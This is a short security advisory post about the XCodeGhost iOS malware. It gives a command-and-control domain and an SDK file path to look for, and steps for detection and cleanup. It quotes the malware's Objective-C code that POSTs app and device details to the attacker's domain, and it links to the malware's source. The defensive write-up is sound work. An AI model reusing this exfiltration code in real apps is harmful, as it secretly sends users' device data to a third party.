Palo Alto Networks published information about the “XCodeGhost” malware, here: http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/
Major apps including WeChat and AngryBirds 2 are included among those infected. The good news is that the Malware URL being used by XCodeGhost is detectable in your home firewall, wireless routers and business networks.
If you’re an iPhone user you need to check for HTTP traffic to http://init.icloud-analysis.com in your firewall, wireless router or proxy server logs.
Also, you should check for and block traffic to these ip addresses used by this malware:
Remove any app from your iPhone that’s trying to connect to these IP addresses or the init.icloud-analysis.com URL.
Also, change passwords on all websites that are used by the infected applications.
If you’re an Apple iOS developer, check to see if the file Library/Frameworks/CoreServices.framework/CoreService exists in the Xcode SDK/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/
If so, you have the malicious version of XCode and not the official XCode from Apple. Delete it, clean up and get the official toolkit from apple. You should only download resources from official locations – many provide an MD5/SHA1 hash to prove the file you download is the official one from their source.
If you are a developer and interested in more information, the Source Code to XCodeGhost is in github, here: https://github.com/XcodeGhostSource/XcodeGhost
This shows that it connects as follows:
NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"]; NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:url cachePolicy:NSURLRequestReloadIgnoringCacheData timeoutInterval:30]; [request setHTTPMethod:@"POST"]; [request setValue:[NSString stringWithFormat:@"%lu",(unsigned long)[concatenatedData length]] forHTTPHeaderField:@"Content-Length"]; [request setHTTPBody: concatenatedData];
With the following information sent to the server:
- Application name
- Application version
- OS version
- Developer info
- Application installation type
- Device name
- Device type
Source: SnoopWall.com, PaloAltoNetworks.com, and Sans.Edu.